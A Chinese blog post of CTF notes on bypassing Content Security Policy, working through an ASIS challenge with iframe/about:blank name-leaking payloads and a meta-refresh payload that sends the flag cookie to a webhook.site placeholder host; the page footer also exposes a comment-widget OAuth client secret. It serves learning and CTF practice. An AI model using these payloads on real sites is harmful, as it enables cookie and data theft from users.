<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>CSP_Bypass - Potat0w0</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Potat0w0"><meta name="msapplication-TileImage" content="/img/icon.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Potat0w0"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="我的一些CSP bypass笔记"><meta property="og:type" content="blog"><meta property="og:title" content="CSP_Bypass"><meta property="og:url" content="http://potatowo233.github.io/2024/03/27/CSP-Bypass/"><meta property="og:site_name" content="Potat0w0"><meta property="og:description" content="我的一些CSP bypass笔记"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="http://potatowo233.github.io/2024/03/27/CSP-Bypass/image-20240328124935819.png"><meta property="og:image" content="http://potatowo233.github.io/2024/03/27/CSP-Bypass/image-20240328133651526.png"><meta property="article:published_time" content="2024-03-27T04:48:16.000Z"><meta property="article:modified_time" content="2024-03-31T17:22:30.399Z"><meta property="article:author" content="Potat0w0"><meta property="article:tag" content="WEB"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="http://potatowo233.github.io/2024/03/27/CSP-Bypass/image-20240328124935819.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://potatowo233.github.io/2024/03/27/CSP-Bypass/"},"headline":"CSP_Bypass","image":["http://potatowo233.github.io/2024/03/27/CSP-Bypass/image-20240328124935819.png","http://potatowo233.github.io/2024/03/27/CSP-Bypass/image-20240328133651526.png"],"datePublished":"2024-03-27T04:48:16.000Z","dateModified":"2024-03-31T17:22:30.399Z","author":{"@type":"Person","name":"Potat0w0"},"publisher":{"@type":"Organization","name":"Potat0w0","logo":{"@type":"ImageObject","url":"http://potatowo233.github.io/img/title.png"}},"description":"我的一些CSP bypass笔记"}</script><link rel="canonical" href="http://potatowo233.github.io/2024/03/27/CSP-Bypass/"><link rel="icon" href="/img/icon.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/rss.xml" title="Potat0w0" type="application/atom+xml">
</head><body class="is-3-column"><script type="text/javascript" color="30,144,255" opacity="0.5" zIndex="-1" count="150" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/title.png" alt="Potat0w0" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">时间轴</a><a class="navbar-item" href="/categories">归档</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a><a class="navbar-item" href="/link">友链</a><a class="navbar-item" href="/map">索引</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Follow_me" href="https://github.com/Potatowo233"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2024-03-27T04:48:16.000Z" title="2024/3/27 12:48:16">2024-03-27</time>发表</span><span class="level-item"><time dateTime="2024-03-31T17:22:30.399Z" title="2024/4/1 01:22:30">2024-04-01</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/WEB%E6%BC%8F%E6%B4%9E/">WEB漏洞</a></span><span class="level-item">7 分钟读完 (大约1015个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">CSP_Bypass</h1><div class="content"><!-- more -->

<h1 id="一些关于CSP的笔记"><a href="#一些关于CSP的笔记" class="headerlink" title="一些关于CSP的笔记"></a>一些关于CSP的笔记</h1><p>在接触xss题中逃不开bypassCSP的知识，但是一直没有做一个自己的笔记，因此这里来记录一下碰到的姿势：</p>
<h3 id="iframe"><a href="#iframe" class="headerlink" title="iframe"></a>iframe</h3><p>原文章：<a target="_blank" rel="noopener" href="https://portswigger.net/research/bypassing-csp-with-dangling-iframes">Link</a></p>
<p>事情还得从去年的一道ASIS的web签到题讲起：</p>
<p>代码很短，逻辑也很简单，就是设置一个CSP，内容只有<code>default-src: &#39;none&#39;</code>，即默认不允许加载任何资源除非有明确指定资源来源，但是显然这里script-src也被替换为空了，所以乍一看似乎基本上是完全没法执行js脚本的，然后主要的可控点是letter的部分，然后会把letter中的<code>$gift$</code>替换为flag（如果是admin的话对应的就是真的flag了）：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-meta">#!/usr/bin/env node</span><br><span class="hljs-keyword">const</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>)<br><span class="hljs-keyword">const</span> cookieParser = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;cookie-parser&#x27;</span>)<br><br><span class="hljs-keyword">const</span> app = <span class="hljs-title function_">express</span>()<br><br>app.<span class="hljs-title function_">use</span>(<span class="hljs-title function_">cookieParser</span>())<br>app.<span class="hljs-title function_">use</span>(<span class="hljs-function">(<span class="hljs-params">req,res,next</span>)=&gt;</span>&#123;<br>    res.<span class="hljs-title function_">header</span>(<br>       <span class="hljs-string">&#x27;Content-Security-Policy&#x27;</span>,<br>       [<span class="hljs-string">`default-src &#x27;none&#x27;;`</span>, ...[(req.<span class="hljs-property">headers</span>[<span class="hljs-string">&#x27;sec-required-csp&#x27;</span>] ?? <span class="hljs-string">&#x27;&#x27;</span>).<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">&#x27;script-src&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>)]] <br>    )<br>    <span class="hljs-keyword">if</span>(req.<span class="hljs-property">headers</span>[<span class="hljs-string">&#x27;referer&#x27;</span>]) <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">type</span>(<span class="hljs-string">&#x27;text/plain&#x27;</span>).<span class="hljs-title function_">send</span>(<span class="hljs-string">&#x27;You have a typo in your http request&#x27;</span>)<br>    <span class="hljs-title function_">next</span>()<br>&#125;)<br><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-function">(<span class="hljs-params">req,res</span>)=&gt;</span>&#123;<br>    <span class="hljs-keyword">let</span> gift = req.<span class="hljs-property">cookies</span>.<span class="hljs-property">gift</span> ?? <span class="hljs-string">&#x27;ASIS&#123;test-flag&#125;&#x27;</span><br>    <span class="hljs-keyword">let</span> letter = (req.<span class="hljs-property">query</span>.<span class="hljs-property">letter</span> ?? <span class="hljs-string">`You were a good kid in 2023 so here&#x27;s a gift for ya: $gift$`</span>).<span class="hljs-title function_">toString</span>()<br>    res.<span class="hljs-title function_">send</span>(<span class="hljs-string">`&lt;pre&gt;<span class="hljs-subst">$&#123;letter.replace(<span class="hljs-string">&#x27;$gift$&#x27;</span>,gift)&#125;</span>&lt;/pre&gt;`</span>)<br>&#125;)<br><br>app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">8000</span>)<br></code></pre></td></tr></table></figure>

<p>思路非常的简单，但是最大的问题就是这里的CSP，相当的严格。。</p>
<p>现在看看上面的文章：</p>
<p>我自己做测试的时候简单写了个页面，CSP设置为<code>default-src &#39;self&#39;</code>，我想获取到secret，给了个用户可控的点。第一想法必然是通过xss来获取到secret，但是这里CSP的设置极为严格：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">&lt;!DOCTYPE html&gt;<br>&lt;html lang=&quot;en&quot;&gt;<br>&lt;head&gt;<br>    &lt;meta charset=&quot;UTF-8&quot;&gt;<br>    &lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &#x27;self&#x27;; &quot;&gt;<br>    &lt;title&gt;CSP Example&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>    &lt;?php echo $_GET[&#x27;a&#x27;];?&gt;<br>    &lt;p&gt;secret: &lt;?php echo md5(rand()); ?&gt;&lt;/p&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<p>在另一个不同源的主机(称之为攻击机)，我们先用一个iframe标签，引用CSP页面，然后再在CSP页面利用参数a插入一个<code>&lt;iframe&gt;</code>标签，并且分别给里外标签的id设为x和y，name设为1和2，</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&#x27;http://192.168.64.1:811/?a=&lt;iframe id=&quot;y&quot; name=&quot;2&quot;&gt;&lt;/iframe&gt;&#x27;</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">cspBypass(this.contentWindow)</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这时候我访问攻击机，如果在希望获取到内层iframe的name，受到的限制并非来源于CSP，而是CORS，他们并非属于同源的主机，因此无法跨站获取到数据</p>
<p>我稍微给外层iframe添加一个onload事件，预期获得到一个object：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&#x27;2&#x27;</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&#x27;http://192.168.64.1:811/?a=&lt;iframe id=&quot;y&quot; name=&quot;1&quot;&gt;&lt;/iframe&gt;&#x27;</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">alert(this.contentWindow)</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>但是实际上并没有如预期的结果一般，在控制台中我们可以看到这样一句话，发现实际上是受限于同源策略：</p>
<p><img src="/2024/03/27/CSP-Bypass/image-20240328124935819.png"></p>
<p>在下面这样一个简单的测试代码中，可以发现下标为0的窗口实际上是内层被嵌套的窗口</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&#x27;2&#x27;</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-attr">srcdoc</span>=<span class="hljs-string">&#x27;&lt;iframe id=&quot;y&quot; name=&quot;1&quot;&gt;&lt;/iframe&gt;&#x27;</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">alert(this.contentWindow[0].name)</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>上面的文章提供了一种很是神奇的特性，当把内层iframe的location属性设置为<code>about:blank</code>的时候，既不会受CSP影响，也不会受到CORS的影响，最为重要的是，此时内外层的iframe窗口变成了“<strong>同源</strong>”的了，而name可以被泄露出来进而被实际上非同源的攻击机接收到，而name处虽无法执行js代码，但是可以和CSP页面的代码产生拼接闭合操作，进而泄露出数据</p>
<p>(不知道为什么不可以直接执行alert，必须要经过setTimeout或者setInterval等回调)</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">cspBypass</span>(<span class="hljs-params">win</span>) &#123;</span><br><span class="language-javascript">   win[<span class="hljs-number">0</span>].<span class="hljs-property">location</span> = <span class="hljs-string">&#x27;about:blank&#x27;</span>;</span><br><span class="language-javascript">   <span class="hljs-built_in">setTimeout</span>(<span class="hljs-function">()=&gt;</span><span class="hljs-title function_">alert</span>(win[<span class="hljs-number">0</span>].<span class="hljs-property">name</span>), <span class="hljs-number">500</span>);</span><br><span class="language-javascript">&#125;</span><br><span class="language-javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&#x27;2&#x27;</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&#x27;http://192.168.64.1:811/?a=&lt;iframe id=&quot;y&quot; name=&quot;1&quot;&gt;&lt;/iframe&gt;&#x27;</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">cspBypass(this.contentWindow)</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>回到ASIS的这道题上，我们让name&#x3D;$gift$，即可泄露出cookie，由于要求来源不能有referer，可以通过iframe的referrerpolicy属性来设置不发送referer，</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">cspBypass</span>(<span class="hljs-params">win</span>) &#123;</span><br><span class="language-javascript">   win[<span class="hljs-number">0</span>].<span class="hljs-property">location</span> = <span class="hljs-string">&#x27;about:blank&#x27;</span>;</span><br><span class="language-javascript">   <span class="hljs-built_in">setTimeout</span>(<span class="hljs-function">()=&gt;</span><span class="hljs-title function_">alert</span>(win[<span class="hljs-number">0</span>].<span class="hljs-property">name</span>), <span class="hljs-number">500</span>);</span><br><span class="language-javascript">&#125;</span><br><span class="language-javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&#x27;2&#x27;</span> <span class="hljs-attr">referrerpolicy</span>=<span class="hljs-string">&quot;no-referrer&quot;</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&#x27;http://192.168.64.1:8000/?letter=&lt;iframe id=&quot;y&quot; name=$gift$&gt;&lt;/iframe&gt;&#x27;</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">cspBypass(this.contentWindow)</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">iframe</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2024/03/27/CSP-Bypass/image-20240328133651526.png"></p>
<p>后来看别人的题解其实用meta也行：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript"><span class="hljs-keyword">const</span> <span class="hljs-variable constant_">HOOK_URL</span> = <span class="hljs-string">&quot;https://webhook.site/xxx&quot;</span>;</span><br><span class="language-javascript"></span><br><span class="language-javascript"><span class="hljs-keyword">const</span> <span class="hljs-title function_">main</span> = <span class="hljs-keyword">async</span> (<span class="hljs-params"></span>) =&gt; &#123;</span><br><span class="language-javascript">  <span class="hljs-keyword">const</span> elm = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">createElement</span>(<span class="hljs-string">&quot;iframe&quot;</span>);</span><br><span class="language-javascript">  elm.<span class="hljs-property">src</span> =</span><br><span class="language-javascript">    <span class="hljs-string">&quot;https://gimmecsp.asisctf.com?letter=&quot;</span> +</span><br><span class="language-javascript">    <span class="hljs-built_in">encodeURIComponent</span>(</span><br><span class="language-javascript">      <span class="hljs-string">`&lt;meta http-equiv=&quot;Refresh&quot; content=&quot;0; URL=<span class="hljs-subst">$&#123;HOOK_URL&#125;</span>/?q=$gift$&quot;&gt;`</span></span><br><span class="language-javascript">    );</span><br><span class="language-javascript">  elm.<span class="hljs-property">referrerPolicy</span> = <span class="hljs-string">&quot;no-referrer&quot;</span>;</span><br><span class="language-javascript">  <span class="hljs-variable language_">document</span>.<span class="hljs-property">body</span>.<span class="hljs-title function_">appendChild</span>(elm);</span><br><span class="language-javascript">&#125;;</span><br><span class="language-javascript"><span class="hljs-title function_">main</span>();</span><br><span class="language-javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br></code></pre></td></tr></table></figure>
</div><div class="article-licensing box"><div class="licensing-title"><p>CSP_Bypass</p><p><a href="http://potatowo233.github.io/2024/03/27/CSP-Bypass/">http://potatowo233.github.io/2024/03/27/CSP-Bypass/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Potat0w0</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2024-03-27</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2024-04-01</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><hr style="height:1px;margin:1rem 0"><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/WEB/">WEB </a></div></div><!--!--></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>爱发电</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/img/alipay.jpg" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/img/wechatpay.png" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2024/04/11/%E5%86%85%E7%BD%91/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">渗透用自查</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2024/03/19/DubheCTF2024/"><span class="level-item">DubheCTF2024</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: "6bc2b3bcbdc6b4071fdea2a238766be3",
            repo: "blog_comments",
            owner: "Potatowo233",
            clientID: "de106bfe6211fc3ceedc",
            clientSecret: "2b3fe4ea85fc7d402cf3c84e18d1e9ae175f1e2d",
            admin: ["Potatowo233"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 20,
            pagerDirection: "last",
            
            
            enableHotKey: true,
            language: "zh-CN",
        })
        gitalk.render('comment-container')</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><div class="card is-hidden-mobile" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/head.jpg" alt="Potat0w0"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Potat0w0</p><p class="is-size-6 is-block">Nice t0 th3 Intern3t</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Fuzhou,China</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">44</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">18</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">8</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://space.bilibili.com/26346947" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/Potatowo233"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/rss.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#一些关于CSP的笔记"><span class="level-left"><span class="level-item">一些关于CSP的笔记</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#iframe"><span class="level-left"><span class="level-item">iframe</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/title.png" alt="Potat0w0" height="28"></a><p class="is-size-7"><span>&copy; 2024 Potat0w0</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">©❤POTATO</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>